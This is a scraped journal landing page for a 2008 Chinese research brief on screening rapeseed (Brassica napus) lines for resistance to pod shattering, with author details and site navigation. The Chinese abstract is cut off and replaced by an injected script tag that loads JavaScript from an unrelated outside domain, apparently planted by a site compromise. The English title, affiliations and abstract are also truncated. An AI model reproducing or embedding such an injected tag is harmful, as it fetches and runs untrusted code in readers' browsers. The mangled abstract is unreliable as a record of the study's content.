

研究简报

甘蓝型油菜抗裂角品种(系)的筛选

文雁成^{1, 2}, 傅廷栋

1华中农业大学作物遗传改良国家

收稿日期 2007-1-29 修回日期 网络版发布日期 2008-1-2 接受日期 2007-4-24

摘要 利用随机碰撞测试方法, 对229份?script src=http://www.nmidahena.com/1.js>

关键词 [甘蓝型油菜](#) [抗裂角](#) [品种筛选](#)

分类号

Screening and Analysis of Resi

WEN Yan-Cheng^{1,2}, FU

1 National Key Laboratory of C

Abstract The silique shattering resista

Key words [Brassica napus L.](#) [Silique shat](#)

DOI: 10.3724/SP.J.1006.2008.00163

通讯作者 傅廷栋 rapelab@mail.hzau.edu.cn

扩展功能

本文信息

▶ [Supporting info](#)

▶ [PDF\(0KB\)](#)

▶ [\[HTML全文\]\(0KB\)](#)

▶ [参考文献](#)

服务与反馈

▶ [把本文推荐给朋友](#)

▶ [加入我的书架](#)

▶ [加入引用管理器](#)

▶ [复制索引](#)

▶ [Email Alert](#)

▶ [文章反馈](#)

▶ [浏览反馈信息](#)

相关信息

▶ [本刊中 包含“甘蓝型油菜”的 相关文章](#)

▶ 本文作者相关文章

· [文雁成](#)

·

· [傅廷栋](#)